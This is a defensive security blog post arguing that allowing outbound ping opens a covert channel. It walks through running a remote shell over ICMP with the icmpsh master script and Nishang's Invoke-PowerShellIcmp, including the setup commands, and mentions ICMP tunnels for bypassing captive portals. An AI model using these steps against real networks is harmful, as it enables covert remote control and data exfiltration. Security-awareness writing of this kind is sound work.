TL;DR

You can run a remote shell over ICMP. If you allow ping out of your network, you also allow a covert channel out of it.

Many customers have asked me this question, and in general ICMP (ICMP is a lot more than just ping, but it is often referred to as ping for simplicity) is a nice thing to use to verify that hosts on the network are responding, or that you have a working internet connection. It is also often used to measure whether links are reliable. My point is that from an IT Pro perspective there are many things we use ICMP for. What I want people to be aware of is that almost anything you allow out of your network can be misused for evil. In this post I will show you how an adversary can use ICMP to exfiltrate data and control a client on the inside while communicating only over ICMP.

The theory of using ICMP for evil is pretty straightforward and was written about as early as 1996, in Phrack magazine (memory lane) http://phrack.org/issues/49/1.html, where it was referred to as Project Loki.

The idea behind ICMP as a covert channel is that you have a server side and a client side, and when they communicate they use the data portion of the ICMP_ECHO and ICMP_ECHOREPLY packets. Echo request and echo reply both carry an arbitrary data field that a normal ping fills with a fixed pattern; a covert channel fills it with commands and command output instead, so data can be sent and received in both directions inside packets that a firewall sees as ordinary pings.

I think this is cool. How many are actually looking at ICMP traffic at an analytic level? (I am making assumptions here.)

ICMP is just one possible covert channel; it could for instance be DNS if the adversary preferred that. There are DNS covert channel projects out there (Google it). Every channel your network can use outwards towards the Internet can most likely be used by an adversary as a covert channel. This blog post, however, discusses ICMP.

Here is a quick demo with screenshots of how this works using the icmpsh tool, ported to Python by Bernardo Damele. The tool was originally made by Nico Leidecker – http://www.leidecker.info/

First, on my attacker machine I turn off the kernel's own ICMP echo replies. Otherwise the kernel would answer the client's echo requests itself and send junk into the covert channel; the icmpsh master must be the only thing replying.



Off command: sysctl -w net.ipv4.icmp_echo_ignore_all=1

On command: sysctl -w net.ipv4.icmp_echo_ignore_all=0

Then I clone the icmpsh GitHub project to my attacker machine:



git clone https://github.com/inquisb/icmpsh.git

Next I start the server (master) side using the Python script in the icmpsh project. The first argument is the attacker machine's own IP address (x.x.x.x) and the second is the IP address of the client to control (y.y.y.y):

python icmpsh_m.py x.x.x.x y.y.y.y

Now the attacker machine waits. Next we go to the client we want to control. There is an executable in the icmpsh project that you can use on Windows clients, but I prefer to use PowerShell. So in this walkthrough I use Nishang's Invoke-PowerShellIcmp. The code can be found here (thanks to Nikhil Mittal for his awesome work):

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1

Take the code and paste it into a PowerShell window on the client. The PowerShell window does not need to be elevated and the user does not need to be a local administrator, because sending ICMP echo requests is not a privileged operation on Windows.



Then invoke the newly defined function, Invoke-PowerShellIcmp, giving it the attacker machine's IP address as its -IPAddress parameter.

If you now go back to your attacker PC you will have shell access over ICMP (just like magic):

The interesting part is looking at the traffic from the client. If I run Wireshark and filter out everything but the ICMP traffic from my VM, this is what I see when I issue commands through the shell:



So, to answer the question in the title, “Is ping okay?”: I would say you need to evaluate the risks in your own environment; there is no answer that fits all situations. Of course, the attacker needs to gain control of one host on the inside in order to use this method, but, as I always say, think of security as layers of defense. Don’t rely on only a few layers. Think ahead.

For example:

– What if the hacker gains access to a client?

— I have AppLocker to prevent execution of code.

— What if the attacker bypasses AppLocker?

—- Users don’t have local admin rights.

—– What if the attacker gains local admin rights?

—— The client computers cannot communicate with other client computers, and the systems containing sensitive data are isolated.

Of course, preventing covert channels over ICMP, DNS and the like is a good idea in general. But in modern networks there are often so many other ways of getting data in and out that an ICMP tunnel is something attackers usually do not even need to resort to.

Also worth mentioning: there are projects that use ICMP as a way of proxying traffic out towards the Internet. For instance, some public Wi-Fi networks require you to register before you get full access, but ICMP is often allowed through before you have authenticated to the captive portal, meaning you can tunnel your traffic through an ICMP proxy and get free Internet.

Examples:

http://dries.eu/rpms/ptunnel/ptunnel

http://neophob.com/2007/10/pingtunnel-for-windows-icmp-tunnel/

(I have not tested these tools, and there are probably more tools like this if you search for them.)

I hope this post illustrated that innocent things like ping can be used for evil as well.